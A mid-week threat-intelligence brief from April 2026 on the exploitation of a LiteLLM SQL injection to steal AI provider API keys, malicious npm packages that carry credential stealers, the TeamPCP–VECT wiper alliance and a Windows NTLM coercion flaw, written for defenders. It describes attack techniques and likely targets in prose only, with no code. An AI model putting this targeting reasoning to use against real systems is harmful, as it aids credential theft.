Monday’s brief documented four AI inference servers exploited within 10-20 hours of disclosure and framed it as a new operational baseline. Forty-eight hours later, the same exploitation clock started on a different component: CVE-2026-42208, a pre-authentication SQL injection in BerriAI’s LiteLLM proxy, was weaponized within 36 hours of its GitHub advisory going public on April 25. Sysdig honeypots confirmed active attacks sending crafted Authorization headers to extract rows from the litellm_credentials and litellm_config tables.

What is being stolen here is different from the inference server campaigns. Attackers are not after user data or lateral movement tokens. They are after LLM provider API keys, the credentials that authorize inference spend against OpenAI, Anthropic, Google, and others. LiteLLM is typically deployed precisely because an organization wants a single authentication and routing layer in front of multiple AI providers. That architectural choice centralizes access control in a way that makes a single credential-dump extraordinarily valuable: one SQL injection yields keys for every AI platform the proxy serves. The attack surface is not just widening; it is moving up the stack to wherever centralized AI access is managed.

The CVSS score is 9.3 and the exploitation window establishes it alongside the AI inference server cluster from Monday. Organizations running LiteLLM as a self-hosted proxy should treat this as actively exploited until patched. The affected component is the authentication path, which means unauthenticated requests are sufficient to trigger the injection; there is no authentication layer to hide behind while patching is staged.

This matters beyond the immediate CVE. The Monday assessment tracked HuggingFace-hosted payloads as a delivery mechanism and noted that the AI exploitation window had “collapsed” for inference servers. LiteLLM’s compromise shows the same attacker logic extending to the proxy and gateway layer, a shift I unpacked at length in Invisible by Default: AI Middleware Is the New Soft Target. The inference server is where models run; the proxy is where access is controlled. Compromising the proxy is, in some respects, more efficient: a single successful attack yields credentials for every AI backend the organization uses, without requiring separate exploitation of each inference platform. If this pattern holds, model registries, fine-tuning pipelines, and API management layers are the next logical targets in the same progression.

One more item reinforces this week’s supply chain pressure on AI development tooling. On April 29, between 09:55 and 12:14 UTC, attackers published malicious versions of SAP-related npm packages containing a preinstall hook that downloads and executes a Bun-runtime credential stealer. The targets are familiar: GitHub and npm tokens, GitHub Actions secrets, AWS, Azure, GCP, and Kubernetes credentials. This is distinct from the Bitwarden CLI operation covered Monday; two independent npm supply chain operations were active in the same week, converging on the same category of developer credentials. The developer toolchain is not experiencing isolated incidents. It is experiencing sustained, concurrent pressure from multiple threat actor clusters, and it fits the trust inversion pattern I documented earlier this month: defenders’ own tooling is the highest-value target precisely because it is trusted by default.

Escalations from Monday

The most significant change since Monday’s brief concerns TeamPCP. Monday’s report detailed their third confirmed supply chain operation in three weeks and noted the campaign’s increasing tempo. Since then, the threat has materially escalated in a way that changes the blast radius calculation entirely.

On April 28, TeamPCP announced a partnership with ransomware-as-a-service operator VECT on BreachForums, advertising combined supply-chain-to-ransomware capabilities. Check Point Research subsequently confirmed that VECT’s decryptor is non-functional: any file at or above 128 KB is permanently destroyed, not encrypted. VECT is a wiper wearing ransomware branding.

The implications for any organization in TeamPCP’s targeting scope are direct. The supply chain operations Monday described, including the Bitwarden CLI compromise via Checkmarx CI, were credential theft campaigns. Organizations that detected and contained them faced credential rotation and audit work. If the same access pattern is handed to VECT as the payload delivery mechanism, the outcome is not a ransom negotiation. It is unrecoverable data destruction. Victims who paid VECT received nothing. The only viable recovery path is offline, air-gapped backups that predate the infection.

This is not a new ransomware gang adding a decryptor bug to their list of problems. The wiper behavior is systematic and confirmed. TeamPCP’s supply chain operations create initial access; VECT converts that access into destruction with no reversibility. Any developer toolchain compromise attributed to TeamPCP in the coming weeks should be treated as a potential wiper precursor, not a contained credential incident.

What to Watch

Two items warrant close attention before next Monday. First, CVE-2026-32202, the Windows Shell authentication coercion flaw that Microsoft partially addressed in February, was confirmed exploited and added to CISA’s KEV catalog on April 29 with a May 12 federal remediation deadline. The flaw enables NTLM hash capture and pass-the-hash lateral movement with no user interaction required. Incomplete patches that leave the original attack surface open are a reliable exploitation target; watch for ransomware groups integrating this into their initial access toolkit before the patch deadline passes. Second, CISA’s Stakeholder Engagement Division has been cut from 189 to 93 personnel as of April 29, with outreach programs described as effectively frozen. The KEV catalog is growing, federal patching deadlines are accelerating, and the coordination capacity that bridges those deadlines to sector-specific implementation is shrinking. The operational gap created by those cuts will not manifest in a single incident; it will appear gradually as advisory follow-through weakens across critical infrastructure sectors.

Security Unlocked publishes threat intelligence and strategic analysis twice weekly. This mid-week brief covers developments from 2026-04-27 through 2026-04-30.